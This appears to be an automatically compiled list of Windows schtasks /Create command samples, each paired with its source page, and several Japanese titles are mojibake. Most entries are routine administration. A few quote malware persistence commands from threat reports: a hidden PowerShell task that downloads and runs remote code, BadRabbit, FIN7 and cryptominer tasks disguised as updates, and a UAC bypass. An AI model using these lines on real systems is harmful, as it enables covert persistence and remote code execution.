Command option Sample:schtasks /Create

Search command sample in the internet.It is the result.

schtasks /Create ƒIƒvƒVƒ‡ƒ“

schtasks /CREATE /TN "Windows Update" /TR "%WINDIR%\system32\bitsadmin.exe /Resume \"Windows Update\"" /SC minute /MO 60 /ED 03/14/2014 /ET 09:00 /Z /IT /RU %USERNAME% > NUL
    Incursus Absconditus: Temporal Persistence with bitsadmin and schtasks : http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html
schtasks /Create /S " +
    Scheduled tasks with Group Policy, schtasks, and PowerShell – 4sysops : http://4sysops.com/archives/scheduled-tasks-with-group-policy-schtasks-and-powershell/
schtasks /create /s computer_name /tn "Weekly Backup" /tr c:\Backup_folder\backup.bat /sc weekly /D FRI /st 13:00:00 /sd 02/28/2012 /ru "domain\admin_user" /rp "admin_password"
    Howto Create Scheduled Task on Remote Computer | Syed Jahanzaib Personal Blog to Share Knowledge ! : http://aacable.wordpress.com/2012/02/28/howto-create-scheduled-task-on-remote-computer/
schtasks /create /tn
    yƒRƒ}ƒ“ƒhƒvƒƒ“ƒvƒgzmschtasks.exe:ƒ^ƒXƒNƒXƒPƒWƒ…[ƒ‹n | No Title : http://ameblo.jp/dakishimetai-com/entry-10489948228.html
SCHTASKS /Create /S MyRemoteServer /TN SwitchActive /U mydomain\amitelman /P MyPassword /TR "C:\temp\SwitchActive.bat" /RL HIGHEST /SC ONCE /ST 00:01 /RU system
    How to run command on remote computer as administrator with highest privileges | Code snippets : http://amitelman.wordpress.com/2015/11/04/how-to-run-command-on-remote-computer-as-administrator/
schtasks /CREATE /TN
    powershell error recovery from native applications : answer199 : http://answer199.diary.to/archives/1038924297.html
schtasks /create /tn test
  : http://answers.microsoft.com/ja-jp/windows/forum/windows_7-windows_programs/schtasks邵Eºãƒ»E§éƒ¢E§ãƒ»E¿éƒ¢E§ãƒ»E¹éƒ¢E§ãƒ»E¯/95704946-823a-469d-9a17-150e2b59e067
schtasks /create /
    Schtasks : http://artemis.wszib.edu.pl/~mdudek/win7/schtasks.html
schtasks /CREATE /SC ONSTART /TN
    Windows scheduled task trigger on system start - Ask Puppet: Puppet DevOps Q&A Community : http://ask.puppet.com/question/14546/windows-scheduled-task-trigger-on-system-start/
schtasks /create /tn OfficeUpdaterA /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://*.*.*.*:8080/kBBldxiub6'''))'" /sc onlogon /ru System
    Schtasks Persistence with PowerShell One Liners | Strategic Cyber LLC : http://blog.cobaltstrike.com/2013/11/09/schtasks-persistence-with-powershell-one-liners/
schtasks /Create /RU "[Domain][Username]" /SC ONLOGON /TN "[Task Name]" /TR "[Path to program to run]" /IT /V1
    Daniel Schroeder's (aka deadlydog) Programming Blog » Scheduled Tasks : http://blog.danskingdom.com/tag/scheduled-tasks/
schtasks /create /tn "Test PHP" /tr "C:\php\php-win.exe C:\hoge\console.php args" /sc minute /mo 5 /it /F
  : http://blog.loadlimits.info/2012/04/郢E§ãƒ»E¿éƒ¢E§ãƒ»E¹éƒ¢E§ãƒ»E¯éƒ¢E§ãƒ»E¹éƒ¢E§ãƒ»E±éƒ¢E§ãƒ»E¸éƒ¢%9D・E¥éƒ¢%9D・E¼éƒ¢%9D・E©é‚µEºãƒ»E¨php邵Eºãƒ»E®éƒ¢E§ãƒ»E³éƒ¢%9D・E³éƒ¢E§ãƒ»E½éƒ¢%9D・E¼éƒ¢%9D・E«éƒ¢E§ãƒ»E¢éƒ¢%9D・8AE±EE9C郢E§ãƒ»E±éƒ¢%9D・E¼/
schtasks /create /ru
    Creating scheduled tasks with schtasks.exe on Windows 7 « Musings From Beyond : http://blog.mindfall.net/@p=327
SCHTASKS /Create /SC weekly /D MON
    windows | Tips & Tricks : http://blog.omotech.com/@tag=windows-2
schtasks /Create /SC ONSTART /TN \Microsoft\Windows\NanoRDP\Start /TR %SystemRoot%\\System32\\NanoRDPServer.exe /RU DefaultAccount /F
    [IoT] Enabling Windows IoT Remote Server on Raspberry Pi – Jaspers' Weblog : http://blog.repsaj.nl/index.php/2016/04/iot-enabling-windows-iot-remote-server-on-raspberry-pi/
schtasks /create /sc MINUTE /MO 10 /tn "Adobe Reader Update" /tr "C:\Documents and Settings\user\Application Data\AdobeServiceUpdate\AdobeServiceUpdate.exe" /F /RL HIGHEST
    The 21st Century 49ers: Small-time Cryptocurrency Mining | Forcepoint : http://blogs.forcepoint.com/security-labs/21st-century-49ers-small-time-cryptocurrency-mining
schtasks /create /tn
    How to create a Schedule Task from command line | Yuval Sinay : http://blogs.microsoft.co.il/yuval14/2011/05/24/how-to-create-a-schedule-task-from-command-line/
SCHTASKS /Create /
    Two Minute Drill: The Schtasks command | Ask the Performance Team Blog : http://blogs.technet.microsoft.com/askperf/2010/05/13/two-minute-drill-the-schtasks-command/
schtasks /create /xml """
    Restore Scheduled Tasks – Ivan Bond's blog : http://bondarenkoivan.wordpress.com/2016/05/17/restore-scheduled-tasks/
schtasks /Create /SC ONCE /ST 19:00 /TR C:\Windows\System32\calc.exe /TN calctask
    CAR-2013-08-001: Execution with schtasks - Cyber Analytics Repository : http://car.mitre.org/wiki/CAR-2013-08-001
schtasks /create /sc onstart /tn memcached /tr "'c:\memcached\memcached.exe' -m 512"
    Installing Memcached on Windows | Commaster's Blog : http://commaster.net/content/installing-memcached-windows
SCHTASKS /Create /SC DAILY /TN IMPS_ADS_CLEANUP_LOGS /TR "forfiles /P \"E:\Programs\CA\Identity Manager\Provisioning Server\logs\ADS\" /S /M
    Windows Scheduled task - Import from XML file | CA Communities : http://communities.ca.com/thread/241738153
schtasks /create /sc hourly /st 00:15 /tn mauticCronJob01 /tr "installdir/php/bin/php installdir/apps/mautic/htdocs/app/console mautic:segments:update --env=prod" /ru "System"
    How to create Cron Jobs in Windows 2008 - Mautic - Bitnami Community : http://community.bitnami.com/t/how-to-create-cron-jobs-in-windows-2008/46979
schtasks /create - creates a new task to be run
    How to create scheduled task via command line on remote computer - PowerShell - Spiceworks : http://community.spiceworks.com/how_to/94705-how-to-create-scheduled-task-via-command-line-on-remote-computer
schtasks /create /sc daily /st 01:00:00 /tn "Clean Test Backups" /tr "cmd /c del c:\temp\uwnetid\test
    How to Automate System Administration: The Basics : http://css.insttech.washington.edu/~lab/BasicSkills/automate_sysadmin.html
schtasks /Create /S <>/RU <> /RP <> /XML
    Moving Multiple Scheduled Tasks into a Folder on Windows Server 2008 - Deep in the Code : http://deepinthecode.com/2013/10/10/moving-multiple-scheduled-tasks-folder-windows-server-2008/
SCHTASKS /CREATE /
    [SOLVED] Chef doesn't create Scheduled Task correctly on Windows node - chef - Chef Mailing List : http://discourse.chef.io/t/solved-chef-doesnt-create-scheduled-task-correctly-on-windows-node/12524
schtasks /create /ru System /sc DAILY /tn "IIS Log Cleaner" /tr "c:\log_cleaner.vbs" /ST 09:00
    CoScale docs - RAM Disk : http://docs.coscale.com/agent/windows/ram-disk/
SCHTASKS /Create /S ABC /U domain\user /P password /SC MINUTE /MO 5 /TN accountant /TR calc.exe /ST 12:00 /ET 14:00 /SD 06/06/2006 /ED 06/06/2006 /RU runasuser /RP userpassword
    SCHTASKS | dosprompt.info : http://dosprompt.info/commands/schtasks.asp
schtasks /create /st "
     Problem with schtasks and my PBCC binary. - PowerBASIC Peer Support Community  : http://forum.powerbasic.com/forum/announcements-articles-and-support-faqs/pbcc-online-help-and-commentary/757550-problem-with-schtasks-and-my-pbcc-binary
SCHTASKS /Create /TN Synchting
    Keeping Syncthing Running: Windows XP, Vista, 7, 8 - Howto - Syncthing Forum : http://forum.syncthing.net/t/keeping-syncthing-running-windows-xp-vista-7-8/519
SchTasks /create /tn Inventory /sc MONTHLY /D MON
    VBScript - SCHTASKS.EXE runs but doesn't populate task list | Tech Support Guy : http://forums.techguy.org/threads/vbscript-schtasks-exe-runs-but-doesnt-populate-task-list.1179260/
SCHTASKS /CREATE /TN "%task_name%" /TR "%
    Window 7+ SCHTASKS example. BATCH ‘µ GitHub : http://gist.github.com/Befzz/4ff6c84d5424f0d085ec
schtasks /Create /TN %s /TR %s /SC %s'
    taskscheduleR/taskscheduleR.R at master ‘µ bnosac/taskscheduleR ‘µ GitHub : http://github.com/bnosac/taskscheduleR/blob/master/R/taskscheduleR.R
schtasks /Create /F /RU "SYSTEM" /SC HOURLY /TN ESETApacheHttpProxyCleanTask
    Apache HTTP Proxy installation and cache : http://help.eset.com/era_install/65/en-US/http_proxy_installation_windows.htm
SCHTASKS /Create /
     ƒ^ƒXƒNƒ‹ƒPƒWƒ…[ƒ‰[@‘€ì@ƒRƒ}ƒ“ƒh@SCHTASKS - Tamasub Lab : http://hisk2tmem.blog61.fc2.com/blog-entry-48.html
SCHTASKS /Create /
    HodentekHelp: Can I use the command AT in Windows 8.1? : http://hodentekhelp.blogspot.com/2014/06/can-i-use-command-at-in-windows-81.html
schtasks /create
    Powershell: Using SCHTASKS in Powershell | ICT-Freak.nl : http://ict-freak.nl/2009/08/25/powershell-using-schtasks-in-powershell/
schtasks /Create /
    2006-12-21 : http://ikeyasu.hatenablog.com/entries/2006/12/21
schtasks /create /tn "MOCLXG" /tr C:\DOCUME
    Not All Malware Samples Are Complex - SANS Internet Storm Center  : http://isc.sans.edu/forums/diary/Not+All+Malware+Samples+Are+Complex/22163/
schtasks /Create /SC daily /RU DOMAIN\user-account/RP myPassword/ST 18:00 /TN Auto-shutdown1800 /TR "%windir%\system32\shutdown.exe /s /f"
    Create A Scheduled Shutdown Via Script In Windows – Jacob Salmela : http://jacobsalmela.com/2015/02/02/create-scheduled-shutdown-via-script-windows/
schtasks /Create /S theserver /RU serviceuser /RP servicepass /SC Weekly
    Domain Cleanups, and Broken Tasks - TheGeekery : http://jon.netdork.net/2007/12/05/domain-cleanups-and-broken-tasks/
schtasks /create
  : http://jpusergis.wordpress.com/2015/08/31/郢E§ãƒ»E¿éƒ¢E§ãƒ»E¹éƒ¢E§ãƒ»E¯éƒ¢E§ãƒ»E¹éƒ¢E§ãƒ»E±éƒ¢E§ãƒ»E¸éƒ¢%9D・E¥éƒ¢%9D・E¼éƒ¢%9D・E©/
SCHTASKS /Create /
    Just geeks: Using command line to control Windows Scheduled Tasks : http://justgeeks.blogspot.com/2011/07/using-command-line-to-control-windows.html
SCHTASKS /Create
    vGeek: Multiple ways to Install Software remotely on Windows - Method 8 Task scheduler : http://kunaludapi.blogspot.com/2015/09/multiple-ways-to-install-software_5.html
SCHTASKS /Create /
    Octopus Deploy Library : http://library.octopusdeploy.com/step-templates/17bc51d1-8b88-4aad-b188-24a0904d0bf2/actiontemplate-windows-scheduled-task-create
schtasks /create /RU administrator /RP password /SC weekly /D SAT /TN defrag /TR c:\windows\system32\defrag.exe /ST 06:00:00
    Creating and Managing Scheduled Tasks from the Command Line in Windows - Life of a Geek Admin : http://lifeofageekadmin.com/creating-and-managing-scheduled-tasks-from-the-command-line-in-windows/
SCHTASKS /Create /
    SCHTASKS.EXE : http://makemsi-manual.dennisbareis.com/schtasks_exe.htm
SCHTASKS /Create /
     [Windows]ƒRƒ}ƒ“ƒhˆê——(ƒwƒ‹ƒvƒŠƒtƒ@ƒŒƒ“ƒX–¢ƒTƒ|[ƒg) - MOMOYA.Labs // “‰®ƒ‰ƒ{  : http://momoya.me.land.to/@pid=29
schtasks /Create
    Schtasks.exe (Windows) : http://msdn.microsoft.com/en-us/library/windows/desktop/bb736357(v=vs.85).aspx
SCHTASKS /CREATE /
    Schtasks /create / - Italian - English Translation and Examples : http://mymemory.translated.net/en/Italian/English/schtasks-/create-/@
schtasks /create /tn "Backup" /tr c:\windows\system32\backup.bat /sc daily /st 02:00:00
    ƒ^ƒXƒNEƒXƒPƒWƒ…[ƒ‰: IT”õ–Y˜^ : http://nofx2.txt-nifty.com/it/2005/06/post_17d2.html
SCHTASKS /Create /
    ƒRƒ}ƒ“ƒhƒvƒƒ“ƒvƒg •W€ƒRƒ}ƒ“ƒh  : http://pasofaq.jp/windows/command/normal7.htm
SchTasks /Create /SC DAILY /TN "NoUAC" /TR "C:\Users\User\Desktop\pentestlab3
    UAC Bypass – Task Scheduler | Penetration Testing Lab : http://pentestlab.blog/2017/05/03/uac-bypass-task-scheduler/
schtasks /create /TN test /TR "powershell.exe %temp%\test.ps1" /SC monthly /NP /RU
    Accessing the status of Windows services from a scheduled task - Peter Hahndorf : http://peter.hahndorf.eu/blog/Accessing-service-status-from-.html
schtasks /create /tn "[
    Windows Server 2003 ƒ^ƒXƒNƒXƒPƒWƒ…[ƒ‰[ˆÚs - Qiita : http://qiita.com/Senba/items/372638c63f0145a17056
schtasks /create /tr calc.exe /sc daily /tn "Test"
    Fixing “The task XML contains too many nodes of the same type” error « rakhesh.com : http://rakhesh.com/windows/fixing-the-task-xml-contains-too-many-nodes-of-the-same-type-error/
schtasks /create /
    Powershell: Scheduling a task | RaSor's Tech Blog : http://rasor.wordpress.com/2013/08/12/powershell-scheduling-a-task/
schtasks /create /sc minute /mo %%%% /tn TimeUpdate /tr \"\\\"
    OilRig uses ISMDoor variant; Possibly Linked to Greenbug Threat Group : http://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/
SCHTASKS /Create /SC DAILY /ST 05:25:00 /TN imagex-save-withdate-auto-exit.bat /TR C:\Programs\Windows\imagex\imagex-save-withdate-auto-exit.bat
    Windows Task Scheduler – ŠÖ˜AŽG‹L « SAND STORM : http://sand-storm.net/wordpress/@p=14188
schtasks /create /f /ru system /sc hourly /st 00:30 /tn
    choco | Schneide Blog : http://schneide.wordpress.com/tag/choco/
schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR
    eBadRabbitf Ransomware Burrows Into Russia, Ukraine | McAfee Blogs : http://securingtomorrow.mcafee.com/mcafee-labs/badrabbit-ransomware-burrows-russia-ukraine/
schtasks /create /tn SomeTask /tr "do.bat arg1 arg2" /sc ONCE /st 00:00:00 /sd 01/01/1991
    windows - How to delete scheduled task from command line without confirmation? (schtasks delete) - Server Fault : http://serverfault.com/a/319702
schtasks /create /
    —pŒê@ƒ^ƒXƒNƒXƒPƒWƒ…[ƒ‰ : http://siromasa.html.xdomain.jp/uwsc/u_term/41_Tasuku.html
SCHTASKS /Create /S system /U user /P password /RU runasuser /RP runaspassword /SC HOURLY /TN rtest1 /TR notepad
    Using SchTasks.exe for Creating and Managing Tasks - Windows 7 Tutorial : http://sourcedaddy.com/windows-7/using-schtasks-exe-for-creating-and-managing-tasks.html
SCHTASKS /Create /SC weekly /D MON
    Schtasks - Scheduled tasks - Windows CMD - SS64.com : http://ss64.com/nt/schtasks.html
schtasks /create (Have a task that runs every day and repeats every hour
    batch file - schtasks /create (Have a task that runs every day and repeats every hour - Stack Overflow : http://stackoverflow.com/questions/21437787/schtasks-create-have-a-task-that-runs-every-day-and-repeats-every-hour@rq=1
schtasks /create /tn Task86 /sc ONSTART /DELAY 0000:30 /RL HIGHEST /tr C:\temp\runme.bat
    Writing a batch script to add a Windows startup activation task. - Chipkin Automation Systems : http://store.chipkin.com/articles/writing-a-batch-script-to-add-a-windows-startup-activation-task/
SCHTASKS /Create /
    How to disable a windows schedule task in Windows 10 using the utility schtasks? - Super User : http://superuser.com/questions/1034673/how-to-disable-a-windows-schedule-task-in-windows-10-using-the-utility-schtasks
SCHTASKS /Create /
    DOSƒRƒ}ƒ“ƒhƒŠƒtƒ@ƒŒƒ“ƒX » SCHTASKS : http://support.koekatamarin.com/dos/schtasks/
SCHTASKS /Create /
    MoonPoint Support Weblog : http://support.moonpoint.com/blog/blosxom/2015/
schtasks /create /ru "NT AUTHORITY\SYSTEM" /tn "sysrun" /tr "cmd.exe /c ""%WinDir%\Temp\temp.bat""" /f /sc "ONIDLE" /i "999"
    create and run scheduled task | Support is >Here< : http://supportishere.com/a-script-to-create-a-a-scheduled-task-that-runs-under-the-system-account/
schtasks /create /RU "SYSTEM" /NP /SC ONSTART /TN Reset-AppX /TR "powershell C:\Powershell\Fix-Sysprep.ps1" /F
    Using PowerShell to resolve Sysprep problems involving App-X packages - TechGenix : http://techgenix.com/sysprep-problems-app-x-packages/
SCHTASKS /Create /RU AMIS\ /RP "my passw" /SC ONCE /TN "Name of scheduled task" /TR "c:\path\to\my\command.cmd" /ST HH:MM /SD MM/DD/YYYY /Z
    Process the content of the Windows scheduler - AMIS Oracle and Java Blog : http://technology.amis.nl/2013/04/03/process-the-content-of-the-windows-scheduler/
schtasks /create /S server /RU DOMAIN\ACCOUNT /RP password /SC daily /ST 15:00 /TN BkupIIS /TR c:\scripts\bkupiis.cmd
    Windows 2008 Schtasks error: User credentials are not allowed on the local machine : http://thebackroomtech.com/2009/04/06/windows-2008-schtasks-error-user-credentials-are-not-allowed-on-the-local-machine/
schtasks /Create /TN "force_shutdown_windows" /f /RU SYSTEM /xml force_shutdown_windows.xml')
    Depot WAPT Les Fourmis Du Web : http://wapt.lesfourmisduweb.org/details-package@package=smp-poweroff_56_all.wapt
SCHTASKS /create /sc HOURLY /st 11:25 /tn "ProcessMaker Cron Job" /tr "C:\wamp\php\php.exe -f C:\processmaker\workflow\engine\bin\cron.php"
    3.2 - Executing Cron Scripts | Documentation@ProcessMaker : http://wiki.processmaker.com/3.2/Executing_cron.php
SCHTASKS /Create /SC ONSTART /TN
    Create elevated shortcut to skip UAC prompt in Windows 10 : http://winaero.com/blog/create-elevated-shortcut-to-skip-uac-prompt-in-windows-10/
SCHTASKS /Create /
    windows ƒRƒ}ƒ“ƒhƒvƒƒ“ƒvƒg: 3ŒŽ 2011 : http://windows-cmd.blogspot.com/2011/03/
schtasks /Create /
    How to schedule tasks in Windows 10 : http://windowsreport.com/schedule-tasks-windows-10/
SchTasks /Create /TN ""Task Name"" /XML ""C:\Task.xml"" /F"
    Scheduled Task Functions? - Advanced Installer : http://www.advancedinstaller.com/forums/viewtopic.php@t=34573
schtasks /create /ru "SYSTEM" /sc onstart /tn shadowsocks /tr "C:\bin\shadowsocks\ss-local.exe -A -c C:\bin\shadowsocks\config.json" /f
    Build shadowsocks-libev on Windows with MinGW-w64 – Alex Sky : http://www.alexyang.me/2016/02/19/build-shadowsocks-libev-on-windows-with-mingw-w64.html
SCHTASKS /CREATE /TN '
    SCHTASKS /CREATE with an argument? - AutoIt General Help and Support - AutoIt Forums : http://www.autoitscript.com/forum/topic/161971-schtasks-create-with-an-argument/
SchTasks /CREATE /
    Using ShellSend with Scheduled Tasks in XP • Discussions • ShellSend by Binary Fortress Software : http://www.binaryfortress.com/ShellSend/Discussions/View/using-shellsend-with-scheduled-tasks-in-xp/@ID=ccc5a7cf-d32c-421b-8eb5-ea33811bbf9e
schtasks /Create /SC ONCE /ST 16:35 /TN RunGAE /TR C:\.jenkins\RunGAE.cmd
    How to set up a Jenkins CI Server on Windows for Google App Engine and Selenium » bloing.net : http://www.bloing.net/2011/10/jenkins-ci-server-windows/
SCHTASKS /Create /TN "%TaskName%" /XML "%XMLFile%" %Runas%
    Run a scheduled task via command line via command line : http://www.briteccomputers.co.uk/forum/showthread.php@tid=3282
SCHTASKS /Create /
    [Solved] bat file for WinService auto-start & stop - CodeProject : http://www.codeproject.com/Questions/810655/bat-file-for-WinService-auto-start-stop
SCHTASKS /Create [/S system [/U username [/P [password]]]] [/RU username [/RP password]] /SC schedule [/MO modifier] [/D day] [/M months] [/I idletime] /TN taskname /TR taskrun [/ST starttime] [/RI interval] [
    MS-DOS schtasks help and information : http://www.computerhope.com/schtasks.htm
schtasks /create /tn "My App" /tr c:\apps\myapp.exe /sc monthly
    Create recurring tasks for automated processes backups archives on CD : http://www.contactez.net/support/backupsautomateCD.html
SCHTASKS /Create /
    Oracle SCHTASKS.EXE Scheduling  - SCHTASKS command : http://www.dba-oracle.com/job_scheduling/schtasks.exe.htm
schtasks /create /sc /tn /tr [/s [/u [\] [/p ]]] [/ru
     Schtasks run in Window Server 2008 : http://www.dotnetheaven.com/article/schtasks-create-part-1-in-window-server-2008
SCHTASKS /Create /SC weekly /D MON
    Windows Task Schedular Via Command Line : SCHTASKS - Windows Tutorials | Dream.In.Code : http://www.dreamincode.net/forums/topic/43081-windows-task-schedular-via-command-line-schtasks/
schtasks /create /sc HOURLY /tn DevCron /tr "cmd.exe 'curl -
    Configuring cron jobs with Windows | Drupal 7 guide on Drupal.org : http://www.drupal.org/docs/7/setting-up-cron-for-drupal/configuring-cron-jobs-with-windows
schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3127978853
    BadRabbit Technical Analysis | Endgame : http://www.endgame.com/blog/technical-blog/badrabbit-technical-analysis
schtasks /create /tn "Idle Logoff" /sc onidle /I 240 /tr "shutdown.exe /l /f" /F
    Script to create scheduled task fails to set conditions : http://www.experts-exchange.com/questions/28904045/Script-to-create-scheduled-task-fails-to-set-conditions.html
schtasks /Create /TN "Automise4 - Mirror FTP Sites" /RU cowatch\Administrator /RP
     Dynamic date time for schedule task - VSoft Technologies - Forums : http://www.finalbuilder.com/support/forums/aft/7368
schtasks /create /
    Windows Server 2003‚ÅŽ€ŠˆŠÄŽ‹ƒƒ‚ [Windows Server 2003](fkimura.com) : http://www.fkimura.com/windows-server-2003-schedule-a0.html
schtasks /create /tn "Startup PowerShell" /tr c:\Startup.bat /sc onstart /ru SYSTEM
    Windows IoT Core: Running a PowerShell Script on Startup - Hackster.io : http://www.hackster.io/falafel-software/windows-iot-core-running-a-powershell-script-on-startup-0aa534
SchTasks /Create /SC DAILY /TN
    How to Create, Modify and Delete Scheduled Tasks from the Command Line  : http://www.howtogeek.com/51236/how-to-create-modify-and-delete-scheduled-tasks-from-the-command-line/
schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR "%ws" /ST %02d:%02d:00
    Free Automated Malware Analysis Service - powered by Falcon Sandbox - Viewing online file analysis results for '1.exe'  : http://www.hybrid-analysis.com/sample/8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93@environmentId=100
schtasks /Create /
    Computer Management | Mastering Administration | InformIT : http://www.informit.com/articles/article.aspx@p=758416&seqNum=3
schtasks /create /tn "Application_Name" /tr c:\apps\Application_Name /sc Value /st HH:MM:SS /ed MM/DD/YYYY
    Phil's NewsPhlash: HOW TO: Use Schtasks.exe to Schedule Tasks in Windows Server 2003 : http://www.intrasection.com/2005/08/how-to-use-schtasksexe-to-schedule.html
schtasks /Create /
    Task Scheduler – IoT Developer : http://www.iot-developer.net/windows-iot/windows-iot-general/os-tasks/task-scheduler
schtasks /create /sc minute /mo 1 /tn "Hello World" /tr \\Server\scripts\helloworld.vbs
    LazyWinAdmin: Run this Scheduled Task every minute !!! : http://www.lazywinadmin.com/2012/03/run-this-task-every-minute.html
schtasks /create /TN "mdumpfs - daily backup" /SC DAILY /ST 03:00:00 /RU SYSTEM /TR "D:\temp\mdumpfs\mdumpfs.exe \"D:\Documents and Settings\" C:\backup"
    mdumpfs - Misuzilla.org : http://www.misuzilla.org/Distribution/mdumpfs/
SCHTASKS /Create /S system /U user /P password /RU runasuser
    Can't get schtasks.exe to work in Windows 7 | The OpenEdge Hive : http://www.oehive.org/node/2069
schtasks /create /tn
    Windows Server 2016 - Schedule a Reboot | PeteNetLive : http://www.petenetlive.com/KB/Article/0001321
SchTasks /Create /S %%M
     User-created (sch)tasks Invisible When Run - Petri IT Knowledgebase Forums  : http://www.petri.com/forums/forum/windows-scripting/general-scripting/39124-scripting-the-creation-of-complex-scheduled-tasks
schtasks /Create /tn
    PowerShell Magazine » Managing scheduled tasks in your environment – Part II : http://www.powershellmagazine.com/2011/11/22/managing-scheduled-tasks-in-your-environment-part-ii/
schtasks /create /f /tn ""GoogleUpdateTaskMachineCorefh5evfbce5bhfd37"" /tr ""wscript.exe //b /e:jscript %TMP%\debug.txt "" /sc ONCE /st ""05:00"" /sd ""12/12/1990""
    FIN7/Carbanak threat actor unleashes Bateleur JScript backdoor | Proofpoint : http://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor
SCHTASKS /Create /
    Any 3rd party at command substitute for Windows 10? 'The AT command has been deprecated. Please use schtasks.exe instead.' - Quora : http://www.quora.com/Any-3rd-party-at-command-substitute-for-Windows-10-The-AT-command-has-been-deprecated-Please-use-schtasks-exe-instead
schtasks /create /RU "NT AUTHORITY\SYSTEM" /SC MINUTE /MO 15 /ST 08:00 /TN
    reddit: the front page of the internet : http://www.reddit.com/r/Windows10/comments/7j4ai1/a_script_to_stop_windows_from_rebooting_itself/
schtasks /create /tn "HowToTask" /tr c:\temp\test.cmd /sc once /st 00:00:00 /sd 2022/01/01 /ru username /rp password
    Schedule or run a Windows task - Real's Java How-to : http://www.rgagnon.com/javadetails/java-schedule-or-run-a-windows-task.html
schtasks /create /tn "Defrag C" /sc DAILY
    24.7. Manage Scheduled Tasks on a Computer - Windows PowerShell Cookbook [Book] : http://www.safaribooksonline.com/library/view/windows-powershell-cookbook/9780596528492/ch24s08.html
schtasks /create /tn mytask /SC HOURLY /TR "calc"
    Running Code From A Non-Elevated Account At Any Time « Thoughts on Security : http://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/
schtasks /Create /
    Linux to Windows Server - Migrating and securing your crontab ‘µ Simon Holywell : http://www.simonholywell.com/post/2009/01/linux-to-windows-server-migrating-and-securing-your-cron/
schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "%SYSTEM%\cmd.exe /C Start \"\" \"%Windir%\dispci.exe\" -id [NUMBER]
    Ransom.BadRabbit | Symantec : http://www.symantec.com/security_response/earthlink_writeup.jsp@docid=2017-102503-0423-99
SCHTASKS /Create /
    Re: batch file for Task scheduler in server2003 : http://www.tech-archive.net/Archive/Windows/microsoft.public.windows.server.scripting/2007-02/msg00012.html
SCHTASKS /Create /RU
    How to Schedule a PC shutdown : http://www.techieshelp.com/schedule-a-pc-to-shutdown/
schtasks /create /sc once /tn Reboot /tr
    How to Schedule a reboot of Windows server | Techwork.dk : http://www.techwork.dk/servers/how-to-schedule-a-reboot-of-windows-server
schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1550063777
     Bad Rabbit Ransomware | VMRay Analyzer Report  : http://www.vmray.com/analyses/bad-rabbit-ransomware-flash-analysis/report/overview.html
schtasks /create /tn "PeriodicLockScreen" /tr "rundll32.exe user32.dll
    OpenSim - A tool for modeling and simulation of musculoskeletal systems : http://www.vvr.ece.upatras.gr/stanev/blog/eye_relief.html
Schtasks /create /RU administrator /RP adminpassword /SC weekly /D SAT /TN defrag /TR c:\windows\system32\defrag.exe /ST 10:00:00
    Schedule tasks from command line : http://www.windows-commandline.com/schedule-tasks-command-line/
schtasks /create /
    Windows - schedule tasks in command line using schtasks - YouTube : http://www.youtube.com/watch@v=g-rwKv-_Ypo
SCHTASKS /CREATE /s
    DOSƒRƒ}ƒ“ƒh/ƒ^ƒXƒNŠÇ—ischtasksj - tak_ism - ƒAƒbƒgƒEƒBƒL : http://www51.atwiki.jp/tak_is/pages/38.html
schtasks /create /tn HelloTask /tr C:\Temp\HelloTask.exe /sc MINUTE]
    YMLib - C# - ƒ^ƒXƒNƒXƒPƒWƒ…[ƒ‰[ : http://ymlib.com/YMWorld/CS/P1/W3/P134/YMWCS134.html

schtasks ‚̃IƒvƒVƒ‡ƒ“ˆê——